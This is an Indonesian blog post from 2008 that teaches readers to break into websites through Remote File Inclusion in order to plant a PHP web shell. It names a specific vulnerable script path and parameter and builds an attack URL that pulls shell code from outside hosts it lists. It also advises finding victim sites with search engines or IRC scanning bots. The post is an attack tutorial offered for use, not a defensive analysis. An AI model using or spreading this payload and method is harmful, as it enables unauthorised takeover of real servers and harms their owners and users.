Senin, 23 Juni 2008

Mengenal Shell Exploite Inject

Hup..Hup.. Alo dekaters kali ini kami sediki berbagi lagi mengenai Shell Exploite Inject, bagi para master - master pasti sudah tidak awam dengan yang kami maksud pada posting ini, dan maaf kalo ada kesalahan dalam informasi.
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.
  • Bagaimana cara mendapatkan shell tersebut ?
Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject
  • Bagaimana cara melihat bugs pada suatu script aplikasi pada website ?
Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script


($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

require <--- panggilan data $docroot <--- variabel /FCDIRECTORY/fc_functions/fc_functions.php <--- directory dan file dimana ditemukan bugs (kerusakan atau kelemahan) jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut. sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?” $docroot.'/FCDIRECTORY/fc_functions/fc_functions.php

jika diputar balikan akan menjadi

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=

Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut ... ? letaknya ada pada script bugs

require

($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link http://psychophobia.co.cc/psycho? atau http://artworkmarket.com/components/rey?
nah sekarang akan kita gabungkan akan menjadi seperti

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=[shell code]

contoh:

www.site.com/
[path]/FCDIRECTORY/fc_functions/fc_functions.php?docroot=[shell code]

gunakan shell code :

http://psychophobia.co.cc/psycho?

contoh :

fc_functions.php?docroot=http://psychophobia.co.cc/psycho?

jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita .

Pusing... pusing... pusing.. , wekekekkeke.., tenang bro pada kenyataannya untuk mencarinya tidak sesulit yang kita pikirkan koq, kadang teori memang rumit tapi praktek yang kita inginkan. Kuncinya agar kita dapat melaksanakannya adalah, 1. kemauan, 2. gemar baca artikel mengenai hal tersebut, 3. sedikit tanya sana - sini, dan terutama... Prakteknya :D Happy Nice Day